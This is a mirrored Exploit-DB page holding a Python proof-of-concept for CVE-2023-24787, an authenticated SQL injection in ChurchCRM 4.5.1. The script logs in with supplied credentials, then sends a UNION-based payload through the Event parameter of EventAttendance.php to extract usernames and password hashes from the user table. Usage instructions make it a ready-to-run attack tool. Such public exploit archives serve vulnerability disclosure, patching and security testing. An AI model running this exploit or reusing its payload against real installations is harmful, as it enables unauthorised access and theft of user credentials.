bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51319.py
Exploit-DB 99cef8d064 DB: 2023-04-08 
11 changes to exploits/shellcodes/ghdb

Snitz Forum v1.0 - Blind SQL Injection

Franklin Fueling Systems  TS-550 - Exploit and Default Password

Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing

MAC 1200R - Directory Traversal

Docker based datastores for IBM Instana 241-2 243-0 - No Authentication

IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)

ChurchCRM 4.5.1 - Authenticated SQL Injection

NotrinosERP 0.7 - Authenticated Blind SQL Injection

Rukovoditel 3.3.1 - Remote Code Execution (RCE)

Wondershare Dr Fone 12.9.6 - Privilege Escalation
2023-04-08 00:16:27 +00:00

61 lines
No EOL
2.6 KiB
Python
Executable file
Raw Blame History

# Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection
# Date: 11-03-2023
# Exploit Author: Arvandy
# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md
# Software Link: https://github.com/ChurchCRM/CRM/releases
# Vendor Homepage: http://churchcrm.io/
# Version: 4.5.1
# Tested on: Windows, Linux
# CVE: CVE-2023-24787
"""
The endpoint /EventAttendance.php is vulnerable to Authenticated SQL Injection (Union-based and Blind-based) via the Event GET parameter.
This endpoint can be triggered through the following menu: Events - Event Attendance Reports - Church Service/Sunday School.
The Event Parameter is taken directly from the query string and passed into the SQL query without any sanitization or input escaping.
This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.
This script is created as Proof of Concept to retrieve the username and password hash from user_usr table.
"""
import sys, requests
def dumpUserTable(target, session_cookies):
print("(+) Retrieving username and password")
print("")
url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target)
headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}
r = requests.get(url, headers=headers)
lines = r.text.splitlines()
for line in lines:
if "<td >Perseverance" in line:
print(line.split("Perseverance")[1].split("</td>")[0])
def login(target, username, password):
target = "%s/session/begin" % (target)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = "User=%s&Password=%s" % (username, password)
s = requests.session()
r = s.post(target, data = data, headers = headers)
return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')
def main():
print("(!) Login to the target application")
session_cookies = login(target, username, password)
print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash")
dumpUserTable(target, session_cookies)
if __name__ == "__main__":
if len(sys.argv) != 4:
print("(!) Usage: python3 exploit.py <URL> <username> <password>")
print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")
sys.exit(-1)
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
main()
Reference in a new issue View git blame Copy permalink